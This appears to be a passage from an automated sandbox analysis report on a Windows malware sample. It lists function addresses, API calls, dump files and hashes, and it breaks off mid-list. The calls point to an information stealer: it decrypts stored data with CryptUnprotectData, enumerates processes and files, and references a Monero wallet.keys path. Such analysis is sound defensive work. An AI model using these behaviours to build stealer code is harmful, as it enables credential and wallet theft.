                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00FD0D73), ref: 00FBE4A2
                  • StrCmpCA.SHLWAPI(?,00FD14F8), ref: 00FBE4F2
                  • StrCmpCA.SHLWAPI(?,00FD14FC), ref: 00FBE508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBEBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: a51d0747d230651e89888983a3afca229691636028b58f4fa7167105c69008ac
                  • Instruction ID: 96b60b4fbba8590df5cec64286f08ba594b34628a92ccd20b1e02c87bbb87fea
                  • Opcode Fuzzy Hash: a51d0747d230651e89888983a3afca229691636028b58f4fa7167105c69008ac
                  • Instruction Fuzzy Hash: 3412197191011D9BDB28FB60DE97FED7339AF54304F4041ADA50A921C1EE386F49EBA2
                  Function 01374B43 Relevance: 9.1, Strings: 6, Instructions: 1612COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: l\O$$`$%Yy$e!]$g; $pj+
                  • API String ID: 0-3638067969
                  • Opcode ID: 4a9c8023efe509bf0edd2522acb12609e9e55d57847a0fb0056202237163bb57
                  • Instruction ID: 4a7eb45e03ae3881b081c057f26f88160c82d52ae76025c1ede92af87ecc2c4d
                  • Opcode Fuzzy Hash: 4a9c8023efe509bf0edd2522acb12609e9e55d57847a0fb0056202237163bb57
                  • Instruction Fuzzy Hash: 80B208F360C2109FE7046E2DEC8567ABBE9EF94720F1A463DE6C4C3744EA3598058697
                  Function 0137B39E Relevance: 9.1, Strings: 6, Instructions: 1579COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 7T]/$F'}$V&~$brqO$.O]$3Y@
                  • API String ID: 0-3354459736
                  • Opcode ID: a9a35a483cab9ff0dd60d75598899ae2f88e83cd5c3890575ccbc29cd324a0eb
                  • Instruction ID: 539b90552102a31874366a8172bb0aa7ffac5b7bdc5a39a3e2459d0c0b9abc84
                  • Opcode Fuzzy Hash: a9a35a483cab9ff0dd60d75598899ae2f88e83cd5c3890575ccbc29cd324a0eb
                  • Instruction Fuzzy Hash: F5B2F6F360C200AFE3086F29EC8567ABBE9EF94720F16493DEAC587744E63558018797
                  Function 013765B6 Relevance: 9.1, Strings: 6, Instructions: 1555COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 'Iw_$'sz~$B Sw$g3Wu$v}v$v]
                  • API String ID: 0-3312680460
                  • Opcode ID: 8c38cd9cd0d70d8db6d10f0a3aa0b1eedce6c938c81ce0a1db8a46996638659b
                  • Instruction ID: 6eb7c833ad7ae6f8020dc5ede085c88c53de4c47027a7aa3226181a08e7259b8
                  • Opcode Fuzzy Hash: 8c38cd9cd0d70d8db6d10f0a3aa0b1eedce6c938c81ce0a1db8a46996638659b
                  • Instruction Fuzzy Hash: 4CA215F360C2049FE7146E2DEC8567ABBE9EF94320F16493DEAC4C3744E63598058697
                  Function 013888E6 Relevance: 7.9, Strings: 5, Instructions: 1649COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /L{$ne?{$w'7$)No$s
                  • API String ID: 0-1082953227
                  • Opcode ID: f42597e84389864390c9c08e8535d442553f1e78964bacec61622521bf9c772b
                  • Instruction ID: 076d2fc68f14368f002beaa467bcde748ae2cda805c199ad5fac3b1cc073188b
                  • Opcode Fuzzy Hash: f42597e84389864390c9c08e8535d442553f1e78964bacec61622521bf9c772b
                  • Instruction Fuzzy Hash: A3B206F390C2109FE704AE29EC8567AFBE9EF94320F1A492DEAC4D3744E67558408797
                  Function 0137E9E5 Relevance: 7.9, Strings: 5, Instructions: 1623COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "4'w$.`O$A:>$[D:G$~ ;
                  • API String ID: 0-3101290174
                  • Opcode ID: d2fb12ddc2017f380df36c8c5a741543b6a246766cc77f79dda07c4b0e78e712
                  • Instruction ID: 4753fa9539d78091161055657917b79337747c8a000bacaccf7c0a30ae227796
                  • Opcode Fuzzy Hash: d2fb12ddc2017f380df36c8c5a741543b6a246766cc77f79dda07c4b0e78e712
                  • Instruction Fuzzy Hash: 4EB208F3A0C2009FE7046E2DEC8567ABBE9EFD4720F1A853DE6C4C3744EA7558058696
                  Function 01383AE6 Relevance: 7.8, Strings: 5, Instructions: 1578COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: *y4/$2VZo$5"]$<GH$j_
                  • API String ID: 0-2202854211
                  • Opcode ID: c6f789fc90887ee6113bfc54471651ce5f724bf11022e10667dad6683bd1220a
                  • Instruction ID: 138aa278eb925238298d4ba6d1c7fa3ee934176689ce291cf4f5bfc1cff690ca
                  • Opcode Fuzzy Hash: c6f789fc90887ee6113bfc54471651ce5f724bf11022e10667dad6683bd1220a
                  • Instruction Fuzzy Hash: 6FB2D5F350C200AFE7086F29EC8567AFBE9EF94720F1A892DE6C5C3744E63558418697
                  Function 00FBC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FBC871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FBC87C
                  • lstrcat.KERNEL32(?,00FD0B46), ref: 00FBC943
                  • lstrcat.KERNEL32(?,00FD0B47), ref: 00FBC957
                  • lstrcat.KERNEL32(?,00FD0B4E), ref: 00FBC978
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 141bb33ac321d38ba1a2a83e17d1898d954432b4e6bbaf55c5aa4bc00002fa4e
                  • Instruction ID: c35882e1f817dd2ca9e385b1d02e7993c27076ae530bf6b63cd1e5d18a965464
                  • Opcode Fuzzy Hash: 141bb33ac321d38ba1a2a83e17d1898d954432b4e6bbaf55c5aa4bc00002fa4e
                  • Instruction Fuzzy Hash: DF416075D0421ADBDB20CF90DD89BEEBBB8AF88304F1041B9E509A7280D7749A84DF91
                  Function 00FB7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FB724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FB7281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00FB72A4
                  • LocalFree.KERNEL32(?), ref: 00FB72AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 71e09781061a4e346e8456f0d44ed4e74e3402459b9def2b70cf9c12c13d6176
                  • Instruction ID: e7c542d191b2898de9605e982c11592a1c691215e9eb307f2e048b10f19fe62b
                  • Opcode Fuzzy Hash: 71e09781061a4e346e8456f0d44ed4e74e3402459b9def2b70cf9c12c13d6176
                  • Instruction Fuzzy Hash: 65015275A40308BBDB24DFE4DD45F9D7778EF44701F104159FB19AB2C4DAB4AA408B64
                  Function 00FC9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FC961E
                  • Process32First.KERNEL32(00FD0ACA,00000128), ref: 00FC9632
                  • Process32Next.KERNEL32(00FD0ACA,00000128), ref: 00FC9647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00FC965C
                  • CloseHandle.KERNEL32(00FD0ACA), ref: 00FC967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 7f44269e10ed3b0ab940505b458dbd5ba855465d623b0d847ff951e60ced9ca6
                  • Instruction ID: 2a1b4fdfe3a22b0fea30344e43cef9773ff42b57406fa0802fea41eaaec0a435
                  • Opcode Fuzzy Hash: 7f44269e10ed3b0ab940505b458dbd5ba855465d623b0d847ff951e60ced9ca6
                  • Instruction Fuzzy Hash: F6014C75A00208EBCB24DFA5D959FEDB7F8EF48311F00419CA90A97280D7B4AB80EF50
                  Function 00FC8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00FD05B7), ref: 00FC86CA
                  • Process32First.KERNEL32(?,00000128), ref: 00FC86DE
                  • Process32Next.KERNEL32(?,00000128), ref: 00FC86F3
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • CloseHandle.KERNEL32(?), ref: 00FC8761
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 7c6c3a031851d35ee35f95768aeaabf4e3bac273284f4a17499cc39357bb0efd
                  • Instruction ID: 5e5781529e2dbe2cdce7b9a13b4980cf18417f2c148f965ff3ebe1465273fbeb
                  • Opcode Fuzzy Hash: 7c6c3a031851d35ee35f95768aeaabf4e3bac273284f4a17499cc39357bb0efd
                  • Instruction Fuzzy Hash: 3E315971901219ABCB24DB50DE46FEEB778EF44704F1041ADA50AA2190EF386E45DFA1
                  Function 00FC8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                  Download Yara Rule
